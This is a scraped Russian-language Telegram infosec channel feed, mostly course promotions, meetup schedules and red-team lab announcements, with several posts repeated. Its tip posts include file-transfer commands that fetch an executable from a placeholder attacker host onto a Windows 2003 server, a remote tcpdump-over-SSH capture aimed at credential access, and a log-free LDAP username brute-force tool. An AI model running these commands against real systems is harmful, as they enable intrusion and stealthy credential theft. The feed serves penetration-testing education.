Распродажа курсов от TheCyberMentor TCM Academy!
Сегодня последний день чтобы успеть купить курс по анализу малвари за 1$. Лично я прикупил! 😉
Expires 1am EDT on 8/22:
Code ILOVEMYVIEWERS - $6
Web Application Security & Penetration Testing (https://academy.tcm-sec.com/p/practical-web-application-security-and-testing)
Expires 11:59pm EDT on 8/22:
Code DOLLARANDADREAM - $1
Practical Malware Analysis & Triage - (https://academy.tcm-sec.com/p/practical-malware-analysis-triage)
Practical Ethical Hacking - (https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)
Linux101 - (https://academy.tcm-sec.com/p/linux-101)
Code WICYS - $6
Mobile Application Penetration Testing (https://academy.tcm-sec.com/p/mobile-application-penetration-testing) - $1 from each sale of this course goes to Women in CyberSecurity (WiCyS)
Expires 11:59pm EDT on 8/28:
Code OK_FINE_I_WILL_TOO - $1
Movement, Pivoting, & Persistence (https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers)
Сегодня последний день чтобы успеть купить курс по анализу малвари за 1$. Лично я прикупил! 😉
Expires 1am EDT on 8/22:
Code ILOVEMYVIEWERS - $6
Web Application Security & Penetration Testing (https://academy.tcm-sec.com/p/practical-web-application-security-and-testing)
Expires 11:59pm EDT on 8/22:
Code DOLLARANDADREAM - $1
Practical Malware Analysis & Triage - (https://academy.tcm-sec.com/p/practical-malware-analysis-triage)
Practical Ethical Hacking - (https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)
Linux101 - (https://academy.tcm-sec.com/p/linux-101)
Code WICYS - $6
Mobile Application Penetration Testing (https://academy.tcm-sec.com/p/mobile-application-penetration-testing) - $1 from each sale of this course goes to Women in CyberSecurity (WiCyS)
Expires 11:59pm EDT on 8/28:
Code OK_FINE_I_WILL_TOO - $1
Movement, Pivoting, & Persistence (https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers)
Tcm-Sec
TCM Security Academy
TCM Security Academy offers practical, job-focused cybersecurity training designed by industry-leading instructors that doesn't break the bank.
👍5
Forwarded from YAH (Egor Bogomolov)
Онлайн митап!
Сегодня стартовал первый митап The Standoff Talks, на котором собрались энтузиасты и профессионалы offensive и defensive security.
Программа на сегодня такая:
12:10 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff
13:20 Роман Максимов — Абузим Zabbix заказчика, или Как бедолаге стать хозяином подконтрольных узлов
14:15 Константин Полишин — RedTeam страдания SOC'а
16:10 Денис Рыбин — О том как Privacy Sandbox веб сломал, но обещал починить
16:55 Вадим Шелест и Михаил Дрягунов — Breaking Red
18:20 Илья Шапошников — MSSQL: dump linked passwords
19:10 Магама́ Базаров — Cisco Nightmare. Дьявольский пентест сетей Cisco
Смотреть прямую трансляцию
Сегодня стартовал первый митап The Standoff Talks, на котором собрались энтузиасты и профессионалы offensive и defensive security.
Программа на сегодня такая:
12:10 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff
13:20 Роман Максимов — Абузим Zabbix заказчика, или Как бедолаге стать хозяином подконтрольных узлов
14:15 Константин Полишин — RedTeam страдания SOC'а
16:10 Денис Рыбин — О том как Privacy Sandbox веб сломал, но обещал починить
16:55 Вадим Шелест и Михаил Дрягунов — Breaking Red
18:20 Илья Шапошников — MSSQL: dump linked passwords
19:10 Магама́ Базаров — Cisco Nightmare. Дьявольский пентест сетей Cisco
Смотреть прямую трансляцию
YouTube
The Standoff Talks
Митап для энтузиастов и профессионалов Offensive/Defensive Security.
Программа
11.00 Интро от организаторов
11.20 Виктор Зварыкин — Не делайте так, как мы
12.10 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff…
Программа
11.00 Интро от организаторов
11.20 Виктор Зварыкин — Не делайте так, как мы
12.10 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff…
#windows2003 #redteam #transferfiles #T1105
Если вы вдруг оказались на старом пыльном Windows 2003ем сервере и нужно доставить туда файлы, есть способы:
Bitsadmin и powershell тут тоже нет.
Есть вариант использовать встроенную утилиту diantz.exe
Далее нам нужно распаковать полученный файл
Утилита certutil может пригодиться для encode/decode:
Если вы вдруг оказались на старом пыльном Windows 2003ем сервере и нужно доставить туда файлы, есть способы:
certutil -urlcache -split -f URL file- работать не будет из за версии приложения
Bitsadmin и powershell тут тоже нет.
Есть вариант использовать встроенную утилиту diantz.exe
diantz.exe \\YOURPUBLICIP\file.exe c:\destinationFolder\target.cab
Далее нам нужно распаковать полученный файл
expand target.cab agent.exe
Утилита certutil может пригодиться для encode/decode:
certutil -decode target.cab target.php
👍4
Forwarded from Zhovner Hub
Топовый обзор Флиппера на Итальянском. Я почти ни слова не пониманию. Чувак вскрыл сейф, сбрутил ворота CAME и вообще выжимает максимум из устройства
https://www.youtube.com/watch?v=YeGAqnU9zeE
https://www.youtube.com/watch?v=YeGAqnU9zeE
YouTube
HO COMPRATO UNA FIGATA DA DEGLI H4CKER RUSS1 🏴☠️⚠️
Acquisto: https://amzn.to/3GXgPWW
Modulo Wifi: https://amzn.to/458DnPz
Registrati, scopri il token YNG e ricevi fino a 25 euro bonus su Young Platform: https://link.youngplatform.com/r/otto
Scarica Step e guadagna subito la tua prima criptovaluta YNG con…
Modulo Wifi: https://amzn.to/458DnPz
Registrati, scopri il token YNG e ricevi fino a 25 euro bonus su Young Platform: https://link.youngplatform.com/r/otto
Scarica Step e guadagna subito la tua prima criptovaluta YNG con…
Ребята из portswigger открыли новую секцию с лабами на тему JWT атак.
Если кто то хочет быстро залететь в web security рекомендую не тратить время и деньги на сторонние курсы и остановиться на их бесплатной Web Academy.
https://portswigger.net/web-security/jwt
Если кто то хочет быстро залететь в web security рекомендую не тратить время и деньги на сторонние курсы и остановиться на их бесплатной Web Academy.
https://portswigger.net/web-security/jwt
portswigger.net
JWT attacks | Web Security Academy
In this section, we'll look at how design issues and flawed handling of JSON web tokens (JWTs) can leave websites vulnerable to a variety of high-severity ...
🔥4👍2
Ресайз ваших изображений без СМС и регистрации
https://github.com/upscayl/upscayl
Результат: https://transfer.sh/P9gEID/av41os4M7c2Gneb1kkRUyTqdJJi_upscayled_4x.jpg
Размер оригинального файла: 427К
Размер полученного файла: 12М
https://github.com/upscayl/upscayl
Результат: https://transfer.sh/P9gEID/av41os4M7c2Gneb1kkRUyTqdJJi_upscayled_4x.jpg
Размер оригинального файла: 427К
Размер полученного файла: 12М
👍1
Forwarded from Positive Events
23 августа мы провели первый митап The Standoff Talks. Очень рады были всех увидеть и пообщаться!
В программе было 8 докладов. Если вы слушали хотя бы один из них и ещё не оставляли обратную связь, расскажите, как вам → ✍️ forms.gle/EWjxKUzcMXL8hgte8
В формочке можно оставить отзыв для каждого спикера, мы передадим фидбэк лично. Также есть раздел по организационным вопросам: время, локация, еда и т.д. Ну и место для пожеланий — оставляйте там любые смелые идеи, возьмём на вооружение :)
💼 Записи докладов выложили на ютуб, все презентации спикеров ↓
🔹 Виктор Зварыкин — Не делайте так, как мы
🔹 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff
🔹 Роман Максимов — Абузим Zabbix заказчика, или Как бедолаге стать хозяином подконтрольных узлов
🔹 Константин Полишин — RedTeam страдания SOC'а
🔹 Денис Рыбин — О том как Privacy Sandbox веб сломал, но обещал починить
🔹 Вадим Шелест и Михаил Дрягунов — Breaking Red
🔹 Илья Шапошников — MSSQL: dump linked passwords
🔹 Магама́ Базаров — Cisco Nightmare. Дьявольский пентест сетей Cisco
До встречи на следующем митапе!
В программе было 8 докладов. Если вы слушали хотя бы один из них и ещё не оставляли обратную связь, расскажите, как вам → ✍️ forms.gle/EWjxKUzcMXL8hgte8
В формочке можно оставить отзыв для каждого спикера, мы передадим фидбэк лично. Также есть раздел по организационным вопросам: время, локация, еда и т.д. Ну и место для пожеланий — оставляйте там любые смелые идеи, возьмём на вооружение :)
💼 Записи докладов выложили на ютуб, все презентации спикеров ↓
🔹 Виктор Зварыкин — Не делайте так, как мы
🔹 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff
🔹 Роман Максимов — Абузим Zabbix заказчика, или Как бедолаге стать хозяином подконтрольных узлов
🔹 Константин Полишин — RedTeam страдания SOC'а
🔹 Денис Рыбин — О том как Privacy Sandbox веб сломал, но обещал починить
🔹 Вадим Шелест и Михаил Дрягунов — Breaking Red
🔹 Илья Шапошников — MSSQL: dump linked passwords
🔹 Магама́ Базаров — Cisco Nightmare. Дьявольский пентест сетей Cisco
До встречи на следующем митапе!
В TryHackMe появился модуль Host Evasions!
This module provides the essential knowledge and fundamental techniques to bypass various host-based security solutions, including AV products, UAC and AppLocker, Logging, Runtime Detection, and AMSI. You will also learn the Living-Off-the-Land technique and how to leverage the Windows Sysinternals tool to perform various Red Team purposes
https://tryhackme.com/module/host-evasions
This module provides the essential knowledge and fundamental techniques to bypass various host-based security solutions, including AV products, UAC and AppLocker, Logging, Runtime Detection, and AMSI. You will also learn the Living-Off-the-Land technique and how to leverage the Windows Sysinternals tool to perform various Red Team purposes
https://tryhackme.com/module/host-evasions
TryHackMe
Host Evasions
Understand the techniques behind host-based security and bypass the most common security products in Windows operating systems.
👍2
Forwarded from Zhovner Hub
Пейпал заблокировал $1.3M наших денег
Мы подключили возможность оплаты с помощью PayPal в нашем магазине. Через месяц пейпал заблочил все деньги без возможности вывода, а это почти полтора миллиона долларов.
Нам нужно оплачивать новую партию производства Flipper Zero и эти деньги очень критичны сейчас.
Если вы можете как-то повлиять на ситуацию или у вас есть контакты в PayPal, помогите пожауйлста.
Ответы на этот твит тоже помогут (тут вся инфа подробно):
https://twitter.com/flipper_zero/status/1567194641610465281
Мы подключили возможность оплаты с помощью PayPal в нашем магазине. Через месяц пейпал заблочил все деньги без возможности вывода, а это почти полтора миллиона долларов.
Нам нужно оплачивать новую партию производства Flipper Zero и эти деньги очень критичны сейчас.
Если вы можете как-то повлиять на ситуацию или у вас есть контакты в PayPal, помогите пожауйлста.
Ответы на этот твит тоже помогут (тут вся инфа подробно):
https://twitter.com/flipper_zero/status/1567194641610465281
💩2
Forwarded from Sys-Admin InfoSec
Hey all, tmrw I will speak at the KazHackStan conference with my presentation with subject:
* Open-Source Projects Responsibility Awareness (by Open BLD Example)
All details you can see on KazHackStan.kz, let's burn 🔥 tomorrow, who will be in Almaty let's get acquainted and let's talk, try to share knowledge with each other 🤘
* Open-Source Projects Responsibility Awareness (by Open BLD Example)
All details you can see on KazHackStan.kz, let's burn 🔥 tomorrow, who will be in Almaty let's get acquainted and let's talk, try to share knowledge with each other 🤘
Forwarded from Mikrotik Ninja
Написал очень кратий обзор прошедшего KazHackStan. Не удивляйтесь краткости - я не настоящий безопасник.
Но даже для таких, как я было очень интересно:
- про построение DevSecOps и AppSec
- про построение инфраструктуры для RedTeam
Видимо, тут надо пояснить: в больших компаниях служба безопасности делится на две части (или больше): BlueTeam и RedTeam. BlueTeam защищает инфру, тогда как RedTeam это что-то вроде внутренних пентестеров - они стараются пробить защиту
- про тюнинг nginx
- страшные отчеты о захардкоженных сикретах
И другое. Читатйте в блоге, может какие-то инструменты вам пригодятся
#kazhackstan #security
Но даже для таких, как я было очень интересно:
- про построение DevSecOps и AppSec
- про построение инфраструктуры для RedTeam
Видимо, тут надо пояснить: в больших компаниях служба безопасности делится на две части (или больше): BlueTeam и RedTeam. BlueTeam защищает инфру, тогда как RedTeam это что-то вроде внутренних пентестеров - они стараются пробить защиту
- про тюнинг nginx
- страшные отчеты о захардкоженных сикретах
И другое. Читатйте в блоге, может какие-то инструменты вам пригодятся
#kazhackstan #security
Unified Kill Chain - еще одна более универсальная модель описывающая и дополняющая существующие модели APT атак.
Research shows that the traditional Cyber Kill Chain® (CKC), as presented by researchers of Lockheed Martin, is perimeter- and malware-focused. As such, the traditional model fails to cover other attack vectors and attacks that occur behind the organizational perimeter. The Unified Kill Chain offers significant improvements over these scope limitations of the CKC and the time-agnostic nature of the tactics in MITRE’s ATT&CK™ model (ATT&CK). Other improvements over these models include: explicating the
role of users by modeling social engineering, recognizing the crucial role of choke points in attacks by modeling pivoting, covering the compromise of integrity and availability in addition to confidentiality and elucidating the overarching objectives of threat actors.
Скачать whitepaper:
https://www.unifiedkillchain.com/assets/The-Unified-Kill-Chain.pdf
THM Cyber Kill Chain
Research shows that the traditional Cyber Kill Chain® (CKC), as presented by researchers of Lockheed Martin, is perimeter- and malware-focused. As such, the traditional model fails to cover other attack vectors and attacks that occur behind the organizational perimeter. The Unified Kill Chain offers significant improvements over these scope limitations of the CKC and the time-agnostic nature of the tactics in MITRE’s ATT&CK™ model (ATT&CK). Other improvements over these models include: explicating the
role of users by modeling social engineering, recognizing the crucial role of choke points in attacks by modeling pivoting, covering the compromise of integrity and availability in addition to confidentiality and elucidating the overarching objectives of threat actors.
Скачать whitepaper:
https://www.unifiedkillchain.com/assets/The-Unified-Kill-Chain.pdf
THM Cyber Kill Chain
Forwarded from APT
🤤 LDAP Nom Nom
Stuck on a network with no credentials?
No worry, you can anonymously bruteforce Active Directory controllers for usernames over LDAP Pings (cLDAP) using new tool - with parallelization you'll get 10K usernames/sec. No Windows audit logs generated.
Features:
— Tries to autodetect DC from environment variables on domain joined machines or falls back to machine hostname FDQN DNS suffix
— Reads usernames to test from stdin (default) or file
— Outputs to stdout (default) or file
— Parallelized (defaults to 8 connections)
— Shows progressbar if you're using both input and output files
https://github.com/lkarlslund/ldapnomnom
#ad #ldap #userenum #tools
Stuck on a network with no credentials?
No worry, you can anonymously bruteforce Active Directory controllers for usernames over LDAP Pings (cLDAP) using new tool - with parallelization you'll get 10K usernames/sec. No Windows audit logs generated.
Features:
— Tries to autodetect DC from environment variables on domain joined machines or falls back to machine hostname FDQN DNS suffix
— Reads usernames to test from stdin (default) or file
— Outputs to stdout (default) or file
— Parallelized (defaults to 8 connections)
— Shows progressbar if you're using both input and output files
https://github.com/lkarlslund/ldapnomnom
#ad #ldap #userenum #tools
GitHub
GitHub - lkarlslund/ldapnomnom: Quietly and anonymously bruteforce Active Directory usernames at insane speeds from Domain Controllers…
Quietly and anonymously bruteforce Active Directory usernames at insane speeds from Domain Controllers by (ab)using LDAP Ping requests (cLDAP) - lkarlslund/ldapnomnom
🛠 Capture packets remotely
#credential_access #discovery #MITRE_T1040
Use sshdump or …
ssh root@X.X.X.X -i /path/to/privatekey tcpdump -i INTERFACE -U -s0 -w - 'not port 22' | wireshark -k -i -
#credential_access #discovery #MITRE_T1040